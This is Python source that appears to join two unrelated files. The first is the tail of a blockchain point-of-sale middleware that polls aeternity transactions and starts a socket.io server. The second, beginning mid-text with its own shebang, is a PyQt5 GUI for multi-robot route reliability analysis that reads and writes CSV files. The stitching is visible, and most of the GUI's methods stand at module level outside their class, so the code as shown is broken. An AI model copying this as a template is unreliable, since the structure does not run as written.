            row = self.db.select("select block_id from pos_height")
            local_h = row['block_id']
            chain_h = self.epoch.get_height()
            logging.info(f"local height {local_h}, chain height {chain_h}")
            if local_h == chain_h:
                return
            while local_h < chain_h:
                # walk the chain in windows of at most 10 blocks
                block_step = min(10, chain_h - local_h)
                next_h = local_h + block_step
                logging.info(f"query tx in block range {local_h}-{next_h}")
                txs = self.epoch.get_transactions_in_block_range(
                    local_h, next_h, tx_types=['spend_tx'])
                for tx in txs:
                    pos_tx = (
                        tx.hash,
                        tx.tx.sender,
                        tx.tx.amount,
                        tx.block_height,
                        datetime.datetime.now()
                    )
                    self.insert_tx(tx.block_height, pos_tx, tx.tx.recipient)
                local_h = next_h
                # update the last polled block
                self.db.execute('update pos_height set block_id = %s', (local_h,))
        except Exception as e:
            logging.error("error polling the chain {}".format(e))
# ______ ____ ____ ______ ______
# .' ___ ||_ \ / _||_ _ `. .' ____ \
# / .' \_| | \/ | | | `. \| (___ \_|
# | | | |\ /| | | | | | _.____`.
# \ `.___.'\ _| |_\/_| |_ _| |_.' /| \____) |
# `.____ .'|_____||_____||______.' \______.'
#
def cmd_start(args=None):
    """Entry point of the `start` command: configure and launch the middleware."""
    if args.config is not None:
        # load the parameters from json and export them as environment variables
        with open(args.config, 'r') as fp:
            for key, value in json.load(fp).items():
                os.environ[key] = value
        reload_settings()
    # incoming orders will be queued here and sent to the pos client
    orders_queue = Queue()
    # database connection parameters
    pg_host = os.getenv('POSTGRES_HOST')
    pg_user = os.getenv('POSTGRES_USER')
    pg_pass = os.getenv('POSTGRES_PASSWORD')
    pg_db = os.getenv('POSTGRES_DB')
    app.config['SECRET_KEY'] = flask_secret
    global database
    database = PG(pg_host, pg_user, pg_pass, pg_db)
    global epoch
    global bar_wallet
    epoch, bar_wallet = get_aeternity()
    global cash_register
    cash_register = CashRegisterPoller(
        PG(pg_host, pg_user, pg_pass, pg_db),
        epoch,
        bar_wallet,
        orders_queue,
        interval=args.polling_interval)
    # background worker polling the chain
    if not args.no_poll:
        cash_register.start()
    # start the app
    logging.info('start socket.io')
    socketio.init_app(app)
    socketio.run(app, host="0.0.0.0", max_size=10000, debug=False)
if __name__ == '__main__':
    # command table: each entry describes one sub-command and its options
    cmds = [
        {
            'name': 'start',
            'help': 'start the beer aepp-pos-middelware',
            'opts': [
                {
                    'names': ['-c', '--config'],
                    'help': 'use the configuration file instead of environment variables',
                    'default': None
                },
                {
                    'names': ['-b', '--no-poll'],
                    'help': 'only start the socketio service not the chain polling worker',
                    'action': 'store_true',
                    'default': False
                },
                {
                    'names': ['-p', '--polling-interval'],
                    'help': 'polling interval in seconds',
                    'default': 15
                }
            ]
        }
    ]
    parser = argparse.ArgumentParser()
    subparsers = parser.add_subparsers()
    subparsers.required = True
    subparsers.dest = 'command'
    # register every command together with its options
    for command in cmds:
        sub = subparsers.add_parser(command['name'], help=command['help'])
        for opt in command.get('opts', []):
            sub.add_argument(*opt['names'],
                            help=opt['help'],
                            action=opt.get('action'),
                            default=opt.get('default'))
    # parse the arguments
    args = parser.parse_args()
    # dispatch to the matching cmd_* function
    handler_name = 'cmd_{0}'.format(args.command.replace('-', '_'))
    ret = getattr(sys.modules[__name__], handler_name)(args)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'potc_analysis_gui.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
#import rospy
import math
import pandas as pd
import os
import sys
import csv
import time
import threading
from datetime import datetime
class POTC_Analysis(object):
    """
    GUI controller for the prognostics-aware multi-robot route (POTC) analysis.

    threshold_type:
    True = System POTC Value
    False = System Reliability Value
    load_control:
    True = Failure Rate Calculation Using Operating Load
    False = Only Failure Rate
    """
    def __init__(self):
        # Column offsets of each robot's data inside the params CSV files;
        # "Count" is the number of load columns per robot.
        # (Turkish keys: "Yuk" = load, "Mesafe" = distance, "Hiz" = speed.)
        self.robot_column_no_dict = {"Yuk": {"Count": 21, "1": 3, "2": 26, "3": 49}, "Mesafe": {"1": 3, "2": 27, "3": 51}, "Hiz": {"1": 81, "2": 149, "3": 217}}
        # rows of the distance matrix, filled by read_distance_file_func()
        self.distance_list = list()
        # NOTE(review): read_speed_func() writes robot_main_dict["Hiz"], which is
        # missing here -- it would raise KeyError if the commented-out speed reads
        # in main_read_func() were re-enabled. Confirm before enabling them.
        self.robot_main_dict = {"Yuk": dict(), "Mesafe": dict()}
        self.current_workspace = self.get_current_workspace()
        #print(self.current_workspace)
        # load distance/load/route data up front, before the UI is built
        self.main_read_func()
        self.robot_count = 3
        # per-robot analysis parameters, seeded by initial_configuration_dicts_func()
        self.initial_configuration_dict = dict()
        self.load_control = True
        self.threshold_type = True
        self.threshold_value = 0.5
        self.route_count = 0
# ------------------------------------------------------------------------------------------------
def setupUi(self, MainWindow):
    """Build the static Qt widget tree for the analysis window.

    Auto-generated by the PyQt5 UI code generator (5.11.3) from
    'potc_analysis_gui.ui' -- hand edits are lost if the .ui file is
    recompiled, so only comments are added here.
    """
    # fixed-size 950x700 main window
    MainWindow.setObjectName("MainWindow")
    MainWindow.resize(950, 700)
    sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
    sizePolicy.setHorizontalStretch(0)
    sizePolicy.setVerticalStretch(0)
    sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
    MainWindow.setSizePolicy(sizePolicy)
    MainWindow.setMinimumSize(QtCore.QSize(950, 700))
    MainWindow.setMaximumSize(QtCore.QSize(950, 700))
    self.centralwidget = QtWidgets.QWidget(MainWindow)
    self.centralwidget.setObjectName("centralwidget")
    # --- "Analysis Options" group box ---
    self.groupBox_selection_analysis = QtWidgets.QGroupBox(self.centralwidget)
    self.groupBox_selection_analysis.setGeometry(QtCore.QRect(20, 20, 570, 330))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.groupBox_selection_analysis.setFont(font)
    self.groupBox_selection_analysis.setObjectName("groupBox_selection_analysis")
    self.comboBox_select_threshold_type = QtWidgets.QComboBox(self.groupBox_selection_analysis)
    self.comboBox_select_threshold_type.setGeometry(QtCore.QRect(275, 150, 150, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.comboBox_select_threshold_type.setFont(font)
    self.comboBox_select_threshold_type.setObjectName("comboBox_select_threshold_type")
    self.label_5 = QtWidgets.QLabel(self.groupBox_selection_analysis)
    self.label_5.setGeometry(QtCore.QRect(0, 150, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_5.setFont(font)
    self.label_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_5.setObjectName("label_5")
    self.doubleSpinBox_threshold_value = QtWidgets.QDoubleSpinBox(self.groupBox_selection_analysis)
    self.doubleSpinBox_threshold_value.setGeometry(QtCore.QRect(275, 200, 100, 35))
    self.doubleSpinBox_threshold_value.setDecimals(5)
    self.doubleSpinBox_threshold_value.setMaximum(1.0)
    self.doubleSpinBox_threshold_value.setSingleStep(0.05)
    self.doubleSpinBox_threshold_value.setProperty("value", 0.5)
    self.doubleSpinBox_threshold_value.setObjectName("doubleSpinBox_threshold_value")
    self.label_8 = QtWidgets.QLabel(self.groupBox_selection_analysis)
    self.label_8.setGeometry(QtCore.QRect(0, 200, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_8.setFont(font)
    self.label_8.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_8.setObjectName("label_8")
    self.label_9 = QtWidgets.QLabel(self.groupBox_selection_analysis)
    self.label_9.setGeometry(QtCore.QRect(0, 250, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_9.setFont(font)
    self.label_9.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_9.setObjectName("label_9")
    self.spinBox_route_count = QtWidgets.QSpinBox(self.groupBox_selection_analysis)
    self.spinBox_route_count.setGeometry(QtCore.QRect(275, 250, 100, 35))
    self.spinBox_route_count.setMaximum(100000)
    self.spinBox_route_count.setObjectName("spinBox_route_count")
    self.label_10 = QtWidgets.QLabel(self.groupBox_selection_analysis)
    self.label_10.setGeometry(QtCore.QRect(120, 290, 271, 41))
    font = QtGui.QFont()
    font.setPointSize(8)
    self.label_10.setFont(font)
    self.label_10.setTextFormat(QtCore.Qt.AutoText)
    self.label_10.setScaledContents(False)
    self.label_10.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_10.setWordWrap(True)
    self.label_10.setObjectName("label_10")
    self.label_3 = QtWidgets.QLabel(self.groupBox_selection_analysis)
    self.label_3.setGeometry(QtCore.QRect(0, 100, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_3.setFont(font)
    self.label_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_3.setObjectName("label_3")
    self.comboBox_load_data = QtWidgets.QComboBox(self.groupBox_selection_analysis)
    self.comboBox_load_data.setGeometry(QtCore.QRect(275, 100, 150, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.comboBox_load_data.setFont(font)
    self.comboBox_load_data.setObjectName("comboBox_load_data")
    self.spinBox_robot_route_count = QtWidgets.QSpinBox(self.groupBox_selection_analysis)
    self.spinBox_robot_route_count.setGeometry(QtCore.QRect(275, 50, 100, 35))
    self.spinBox_robot_route_count.setMinimum(1)
    self.spinBox_robot_route_count.setMaximum(1000)
    self.spinBox_robot_route_count.setObjectName("spinBox_robot_route_count")
    self.pushButton_set_robot_count = QtWidgets.QPushButton(self.groupBox_selection_analysis)
    self.pushButton_set_robot_count.setGeometry(QtCore.QRect(460, 40, 100, 50))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.pushButton_set_robot_count.setFont(font)
    self.pushButton_set_robot_count.setObjectName("pushButton_set_robot_count")
    self.label_11 = QtWidgets.QLabel(self.groupBox_selection_analysis)
    self.label_11.setGeometry(QtCore.QRect(0, 50, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_11.setFont(font)
    self.label_11.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_11.setObjectName("label_11")
    # --- read-only results pane and start button ---
    self.plainTextEdit_result_view = QtWidgets.QPlainTextEdit(self.centralwidget)
    self.plainTextEdit_result_view.setGeometry(QtCore.QRect(620, 35, 300, 500))
    self.plainTextEdit_result_view.setReadOnly(True)
    self.plainTextEdit_result_view.setPlainText("")
    self.plainTextEdit_result_view.setObjectName("plainTextEdit_result_view")
    self.pushButton_start_analysis = QtWidgets.QPushButton(self.centralwidget)
    self.pushButton_start_analysis.setGeometry(QtCore.QRect(690, 550, 150, 75))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.pushButton_start_analysis.setFont(font)
    self.pushButton_start_analysis.setObjectName("pushButton_start_analysis")
    # --- "Robot Configuration" group box (disabled until a count is set) ---
    self.groupBox_robot_configuration = QtWidgets.QGroupBox(self.centralwidget)
    self.groupBox_robot_configuration.setEnabled(False)
    self.groupBox_robot_configuration.setGeometry(QtCore.QRect(20, 400, 570, 271))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.groupBox_robot_configuration.setFont(font)
    self.groupBox_robot_configuration.setObjectName("groupBox_robot_configuration")
    self.label_12 = QtWidgets.QLabel(self.groupBox_robot_configuration)
    self.label_12.setGeometry(QtCore.QRect(0, 30, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_12.setFont(font)
    self.label_12.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_12.setObjectName("label_12")
    self.comboBox_select_robot = QtWidgets.QComboBox(self.groupBox_robot_configuration)
    self.comboBox_select_robot.setGeometry(QtCore.QRect(275, 30, 150, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.comboBox_select_robot.setFont(font)
    self.comboBox_select_robot.setObjectName("comboBox_select_robot")
    self.label_7 = QtWidgets.QLabel(self.groupBox_robot_configuration)
    self.label_7.setGeometry(QtCore.QRect(400, 230, 71, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_7.setFont(font)
    self.label_7.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
    self.label_7.setObjectName("label_7")
    self.label_6 = QtWidgets.QLabel(self.groupBox_robot_configuration)
    self.label_6.setGeometry(QtCore.QRect(400, 180, 71, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_6.setFont(font)
    self.label_6.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
    self.label_6.setObjectName("label_6")
    self.doubleSpinBox_nominal_capacity_value = QtWidgets.QDoubleSpinBox(self.groupBox_robot_configuration)
    self.doubleSpinBox_nominal_capacity_value.setGeometry(QtCore.QRect(275, 230, 100, 35))
    self.doubleSpinBox_nominal_capacity_value.setDecimals(1)
    self.doubleSpinBox_nominal_capacity_value.setMaximum(100000.0)
    self.doubleSpinBox_nominal_capacity_value.setSingleStep(0.5)
    self.doubleSpinBox_nominal_capacity_value.setObjectName("doubleSpinBox_nominal_capacity_value")
    self.doubleSpinBox_robot_speed_value = QtWidgets.QDoubleSpinBox(self.groupBox_robot_configuration)
    self.doubleSpinBox_robot_speed_value.setGeometry(QtCore.QRect(275, 180, 100, 35))
    self.doubleSpinBox_robot_speed_value.setDecimals(3)
    self.doubleSpinBox_robot_speed_value.setMaximum(100.0)
    self.doubleSpinBox_robot_speed_value.setObjectName("doubleSpinBox_robot_speed_value")
    self.label_4 = QtWidgets.QLabel(self.groupBox_robot_configuration)
    self.label_4.setGeometry(QtCore.QRect(0, 230, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_4.setFont(font)
    self.label_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_4.setObjectName("label_4")
    self.lineEdit_hazard_rate_value = QtWidgets.QLineEdit(self.groupBox_robot_configuration)
    self.lineEdit_hazard_rate_value.setGeometry(QtCore.QRect(275, 80, 200, 35))
    self.lineEdit_hazard_rate_value.setObjectName("lineEdit_hazard_rate_value")
    self.label = QtWidgets.QLabel(self.groupBox_robot_configuration)
    self.label.setGeometry(QtCore.QRect(0, 80, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label.setFont(font)
    self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label.setObjectName("label")
    self.label_2 = QtWidgets.QLabel(self.groupBox_robot_configuration)
    self.label_2.setGeometry(QtCore.QRect(0, 180, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_2.setFont(font)
    self.label_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_2.setObjectName("label_2")
    self.lineEdit_start_reliability_value = QtWidgets.QLineEdit(self.groupBox_robot_configuration)
    self.lineEdit_start_reliability_value.setGeometry(QtCore.QRect(275, 130, 200, 35))
    self.lineEdit_start_reliability_value.setObjectName("lineEdit_start_reliability_value")
    self.label_13 = QtWidgets.QLabel(self.groupBox_robot_configuration)
    self.label_13.setGeometry(QtCore.QRect(0, 130, 250, 35))
    font = QtGui.QFont()
    font.setPointSize(15)
    self.label_13.setFont(font)
    self.label_13.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
    self.label_13.setObjectName("label_13")
    MainWindow.setCentralWidget(self.centralwidget)
    # ---------------------------------------------------------------------------------------------------------------
    # hand-added hook: set widget defaults and connect signal handlers
    self.potc_gui_main_func()
    # ---------------------------------------------------------------------------------------------------------------
    self.retranslateUi(MainWindow)
    QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
    """Set all user-visible widget texts (auto-generated translation hook).

    Generated by the PyQt5 UI code generator; do not hand-edit the strings,
    change the .ui file instead.
    """
    _translate = QtCore.QCoreApplication.translate
    MainWindow.setWindowTitle(_translate("MainWindow", "Prognostic Aware Multi Robot Route Planning"))
    self.groupBox_selection_analysis.setTitle(_translate("MainWindow", "Analysis Options"))
    self.label_5.setText(_translate("MainWindow", "Select Threshold Type"))
    self.label_8.setText(_translate("MainWindow", "Threshold Value"))
    self.label_9.setText(_translate("MainWindow", "Route Count"))
    self.label_10.setText(_translate("MainWindow", "Note: It refers to the number of routes to be analyzed. If the value is 0, it refers to the maximum value."))
    self.label_3.setText(_translate("MainWindow", "Use Load Data"))
    self.pushButton_set_robot_count.setText(_translate("MainWindow", "Set Count"))
    self.label_11.setText(_translate("MainWindow", "Set Robot Count"))
    self.pushButton_start_analysis.setText(_translate("MainWindow", "Start Analysis"))
    self.groupBox_robot_configuration.setTitle(_translate("MainWindow", "Robot Configuration"))
    self.label_12.setText(_translate("MainWindow", "Select Robot"))
    self.label_7.setText(_translate("MainWindow", "kg"))
    self.label_6.setText(_translate("MainWindow", "km / h"))
    self.label_4.setText(_translate("MainWindow", "Nominal Capacity Value"))
    self.label.setText(_translate("MainWindow", "Hazard Rate Value"))
    self.label_2.setText(_translate("MainWindow", "Robot Speed Value"))
    self.label_13.setText(_translate("MainWindow", "Start Reliability Value"))
# ------------------------------------------------------------------------------------------------
def potc_gui_main_func(self):
    """Initialise the GUI: apply widget defaults, then connect signal handlers.

    NOTE(review): the order appears deliberate -- defaults are set before the
    handlers are connected, presumably so the programmatic value changes do
    not fire the event callbacks. Confirm before reordering.
    """
    self.gui_default_parameters_func()
    self.potc_gui_events_func()
def gui_default_parameters_func(self):
    """Populate the widgets with their default values and choices."""
    self.comboBox_load_data.addItems(["True", "False"])
    self.comboBox_select_threshold_type.addItems(["POTC Value", "Reliability Value"])
    self.doubleSpinBox_threshold_value.setValue(0.5)
    self.spinBox_route_count.setValue(0)
    # placeholder entry until the robot count is fixed
    self.comboBox_select_robot.addItem("None")
    # the analysis button stays disabled until "Set Count" is pressed
    self.pushButton_start_analysis.setEnabled(False)
def potc_gui_events_func(self):
    """Connect every widget signal to its handler (order preserved)."""
    wiring = (
        (self.pushButton_set_robot_count.clicked, self.click_set_robot_count_button_func),
        (self.pushButton_start_analysis.clicked, self.click_start_analysis_button_func),
        (self.lineEdit_hazard_rate_value.textChanged, self.event_lineEdit_hazard_rate_value_func),
        (self.doubleSpinBox_robot_speed_value.valueChanged, self.event_doubleSpinBox_robot_speed_value_func),
        (self.comboBox_load_data.currentIndexChanged, self.event_comboBox_load_data_func),
        (self.doubleSpinBox_nominal_capacity_value.valueChanged, self.event_doubleSpinBox_nominal_capacity_value_func),
        (self.comboBox_select_threshold_type.currentIndexChanged, self.event_comboBox_select_threshold_type_func),
        (self.doubleSpinBox_threshold_value.valueChanged, self.event_doubleSpinBox_threshold_value_func),
        (self.spinBox_route_count.valueChanged, self.event_spinBox_route_count_func),
        (self.comboBox_select_robot.currentIndexChanged, self.event_comboBox_select_robot_func),
        (self.lineEdit_start_reliability_value.textChanged, self.event_lineEdit_start_reliability_value_func),
    )
    for signal, handler in wiring:
        signal.connect(handler)
def click_set_robot_count_button_func(self):
    """Freeze the robot count, seed default configs and unlock the config panel."""
    # cap the count at the 3 robots the CSV layout supports
    self.robot_count = min(self.spinBox_robot_route_count.value(), 3)
    self.initial_configuration_dicts_func(self.robot_count)
    print(self.initial_configuration_dict)
    labels = ["Robot " + str(idx + 1) for idx in range(len(self.initial_configuration_dict))]
    self.comboBox_select_robot.addItems(labels)
    # lock the count controls, enable configuration and analysis
    self.label_11.setEnabled(False)
    self.spinBox_robot_route_count.setEnabled(False)
    self.pushButton_set_robot_count.setEnabled(False)
    self.groupBox_robot_configuration.setEnabled(True)
    self.pushButton_start_analysis.setEnabled(True)
def click_start_analysis_button_func(self):
    """Run the POTC analysis, dump results to CSV and show the route summary."""
    try:
        potc_class = CalculatePOTC(self.robot_count, self.robot_main_dict, self.initial_configuration_dict, self.distance_list, self.load_control, self.threshold_type, self.threshold_value, self.route_count)
        # run on a worker thread (join() makes this call blocking anyway)
        worker = threading.Thread(target=potc_class.calculate_main_potc_func)
        worker.start()
        worker.join()
        stamp = datetime.now().strftime("%Y_%m_%d_-_%H_%M_%S")
        prefix = "potc_analysis_loaded_" if self.load_control else "potc_analysis_unloaded_"
        self.csv_write(potc_class.write_data_list, str(prefix + stamp))
        print("\n\n\nDosya Yazma islemi Basari ile gerceklesti")
        self.set_plain_text_edit_result_view_func(potc_class.selected_route_count_list)
    except Exception as err:
        print("\n\nError: click_start_analysis_button_func")
        print(err)
def event_lineEdit_hazard_rate_value_func(self):
    """Store the edited hazard rate into the selected robot's configuration."""
    try:
        robot_label = str(self.comboBox_select_robot.currentText())
        if robot_label not in ("None", ""):
            robot_no = robot_label.split("Robot ")[-1]
            text = self.lineEdit_hazard_rate_value.text()
            if text != "":
                self.initial_configuration_dict["robot_" + str(robot_no)]["Hazard Rate"] = float(text)
    except Exception as err:
        print("\n\nError: event_lineEdit_hazard_rate_value_func")
        print(err)
def event_doubleSpinBox_robot_speed_value_func(self):
    """Store the edited speed into the selected robot's configuration."""
    try:
        robot_label = str(self.comboBox_select_robot.currentText())
        if robot_label not in ("None", ""):
            robot_no = robot_label.split("Robot ")[-1]
            self.initial_configuration_dict["robot_" + str(robot_no)]["Speed"] = float(self.doubleSpinBox_robot_speed_value.value())
    except Exception as err:
        print("\n\nError: event_doubleSpinBox_robot_speed_value_func")
        print(err)
def event_comboBox_load_data_func(self):
    """Toggle load-based failure-rate calculation from the combo box."""
    try:
        self.load_control = str(self.comboBox_load_data.currentText()) == "True"
    except Exception as err:
        print("\n\nError: comboBox_load_data")
        print(err)
def event_doubleSpinBox_nominal_capacity_value_func(self):
    """Store the edited nominal capacity into the selected robot's configuration."""
    try:
        robot_label = str(self.comboBox_select_robot.currentText())
        if robot_label not in ("None", ""):
            robot_no = robot_label.split("Robot ")[-1]
            self.initial_configuration_dict["robot_" + str(robot_no)]["Nominal Capacity"] = float(self.doubleSpinBox_nominal_capacity_value.value())
    except Exception as err:
        print("\n\nError: event_doubleSpinBox_nominal_capacity_value_func")
        print(err)
def event_comboBox_select_threshold_type_func(self):
    """Switch between POTC-value and reliability-value thresholding."""
    try:
        choice = str(self.comboBox_select_threshold_type.currentText())
        if choice == "POTC Value":
            self.threshold_type = True
        elif choice == "Reliability Value":
            self.threshold_type = False
        # any other text leaves the current setting untouched
    except Exception as err:
        print("\n\nError: event_comboBox_select_threshold_type_func")
        print(err)
def event_doubleSpinBox_threshold_value_func(self):
    """Keep self.threshold_value in sync with the spin box."""
    try:
        self.threshold_value = float(self.doubleSpinBox_threshold_value.value())
    except Exception as err:
        print("\n\nError: event_doubleSpinBox_threshold_value_func")
        print(err)
def event_spinBox_route_count_func(self):
    """Keep self.route_count in sync with the spin box."""
    try:
        self.route_count = int(self.spinBox_route_count.value())
    except Exception as err:
        print("\n\nError: event_spinBox_route_count_func")
        print(err)
def event_comboBox_select_robot_func(self):
    """Load the selected robot's configuration into the form, or clear it."""
    try:
        robot_label = str(self.comboBox_select_robot.currentText())
        if robot_label not in ("None", ""):
            key = "robot_" + str(robot_label.split("Robot ")[-1])
            config = self.initial_configuration_dict[key]
            self.set_enable_robot_configuration_group_func(True)
            self.lineEdit_hazard_rate_value.setText(str(config["Hazard Rate"]))
            self.lineEdit_start_reliability_value.setText(str(config["Reliability"]))
            self.doubleSpinBox_robot_speed_value.setValue(float(config["Speed"]))
            self.doubleSpinBox_nominal_capacity_value.setValue(float(config["Nominal Capacity"]))
        else:
            # "None" (or empty) selected: blank and disable the form
            self.lineEdit_hazard_rate_value.setText("")
            self.lineEdit_start_reliability_value.setText("")
            self.doubleSpinBox_robot_speed_value.setValue(0.0)
            self.doubleSpinBox_nominal_capacity_value.setValue(0.0)
            self.set_enable_robot_configuration_group_func(False)
    except Exception as err:
        print("\n\nError: event_comboBox_select_robot_func")
        print(err)
def event_lineEdit_start_reliability_value_func(self):
    """Store the edited start reliability into the selected robot's configuration."""
    try:
        robot_label = str(self.comboBox_select_robot.currentText())
        if robot_label not in ("None", ""):
            robot_no = robot_label.split("Robot ")[-1]
            text = self.lineEdit_start_reliability_value.text()
            if text != "":
                self.initial_configuration_dict["robot_" + str(robot_no)]["Reliability"] = float(text)
    except Exception as err:
        print("\n\nError: event_lineEdit_start_reliability_value_func")
        print(err)
def set_plain_text_edit_result_view_func(self, set_value):
    """Render (route, count) pairs into the read-only results pane."""
    self.plainTextEdit_result_view.clear()
    # each entry on its own line, preceded by a newline like the original output
    text = "".join("\n" + str(pair[0]) + "\t-> " + str(pair[1]) for pair in set_value)
    self.plainTextEdit_result_view.setPlainText(text)
# ------------------------------------------------------------------------------------------------
@classmethod
def get_current_workspace(cls):
    """Return the workspace root by stripping this script's package directory
    name from the script file's absolute path."""
    script_dir = os.path.dirname(os.path.realpath(__file__))
    # second-to-last path component of the invoked script is the package dir
    directory_name = sys.argv[0].split('/')[-2]
    return script_dir.split(str(directory_name))[0]
def read_distance_file_func(self):
    """Load the distance matrix from distances.csv into self.distance_list."""
    csv_path = str(self.current_workspace) + 'potc_analysis/params/distances.csv'
    self.distance_list = pd.read_csv(csv_path, sep=',', header=None).values
def read_route_loads_func(self, robot_no):
    """Read per-route load values for one robot from 1003_routeLoads.csv."""
    path = str(self.current_workspace) + 'potc_analysis/params/1003_routeLoads.csv'
    with open(path, 'r') as csvfile:
        rows = csv.reader(csvfile, delimiter=',')
        next(rows)  # skip the header row
        first_col = int(self.robot_column_no_dict["Yuk"][str(robot_no)])
        col_count = self.robot_column_no_dict["Yuk"]["Count"]
        robot_load_dict = dict()
        for row in rows:
            # row[0] is the route id; the robot's loads start at first_col
            robot_load_dict[str(row[0])] = [float(row[first_col + offset]) for offset in range(col_count)]
        self.robot_main_dict["Yuk"][str("robot_" + str(robot_no))] = robot_load_dict
def read_route_func(self, robot_no):
    """Read each route's node sequence for one robot from 1003_routeSet.csv."""
    path = str(self.current_workspace) + 'potc_analysis/params/1003_routeSet.csv'
    with open(path, 'r') as csvfile:
        rows = csv.reader(csvfile, delimiter=',')
        next(rows)  # skip the header row
        base = int(self.robot_column_no_dict["Mesafe"][str(robot_no)])
        robot_route_dict = dict()
        for row in rows:
            # the column just before the data holds this route's length
            length = int(row[base - 1])
            robot_route_dict[str(row[0])] = [float(row[base + offset]) for offset in range(length)]
        self.robot_main_dict["Mesafe"][str("robot_" + str(robot_no))] = robot_route_dict
def read_speed_func(self, robot_no):
    """Load per-route segment speed lists ("Hiz") for one robot.

    A route with N waypoints has N-1 segments, hence one fewer speed than the
    waypoint count in column ``Mesafe[robot_no] - 1``.  Speeds start at column
    ``Hiz[robot_no]``.  NOTE(review): reads 1003_routeSet.csv, the same file as
    read_route_func — confirm speeds really live there.
    """
    path = str(self.current_workspace) + 'potc_analysis/params/1003_routeSet.csv'
    speeds_by_route = dict()
    with open(path, 'r') as csvfile:
        rows = csv.reader(csvfile, delimiter=',')
        next(rows)  # skip the header row
        for row in rows:
            segment_count = int(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] - 1)]) - 1
            start = self.robot_column_no_dict["Hiz"][str(robot_no)]
            speeds_by_route[str(row[0])] = [float(row[int(start + offset)]) for offset in range(segment_count)]
    self.robot_main_dict["Hiz"][str("robot_" + str(robot_no))] = speeds_by_route
def main_read_func(self):
    """Load all analysis inputs: the distance matrix, then loads and routes
    for robots 1-3 (speed data is currently disabled)."""
    self.read_distance_file_func()
    for robot_no in (1, 2, 3):
        self.read_route_loads_func(robot_no)
    for robot_no in (1, 2, 3):
        self.read_route_func(robot_no)
    # Speed files are not read at the moment:
    # for robot_no in (1, 2, 3): self.read_speed_func(robot_no)
def csv_write(self, write_data_list, file_name):
    """Write rows to ``<workspace>/potc_analysis/params/write_data/<file_name>.csv``.

    :param write_data_list: iterable of rows (each an iterable of cells),
        passed straight to ``csv.writer.writerows``.
    :param file_name: base name of the output file, without the extension.
    """
    out_path = str(self.current_workspace) + 'potc_analysis/params/write_data/' + str(file_name) + '.csv'
    # newline='' lets the csv module control line endings (the original code
    # omitted it, which produces blank rows on Windows).  The context manager
    # closes the file, so the original redundant csvFile.close() is dropped.
    with open(out_path, 'w+', newline='') as csv_file:
        csv.writer(csv_file).writerows(write_data_list)
# -------------------------------------------------------------------
def initial_configuration_dicts_func(self, robot_count):
    """Seed per-robot defaults (hazard rate, starting reliability, nominal
    capacity, speed in km/h) for robots 1..robot_count.  A fresh dict is
    created per robot so entries never share state."""
    for robot_no in range(1, robot_count + 1):
        self.initial_configuration_dict["robot_" + str(robot_no)] = {
            "Hazard Rate": 5.07e-04,
            "Reliability": 1.0,
            "Nominal Capacity": 200.0,
            "Speed": 4.32,
        }
def set_enable_robot_configuration_group_func(self, status):
    """Enable or disable every widget in the robot-configuration group."""
    widget_names = (
        'lineEdit_hazard_rate_value',
        'lineEdit_start_reliability_value',
        'doubleSpinBox_robot_speed_value',
        'doubleSpinBox_nominal_capacity_value',
        'label', 'label_13', 'label_2', 'label_4', 'label_6', 'label_7',
    )
    for name in widget_names:
        getattr(self, name).setEnabled(status)
# -------------------------------------------------------------------
class CalculatePOTC:
    """
    Calculates the probability of task completion (POTC) and system
    reliability for a fleet of robots repeatedly executing candidate routes,
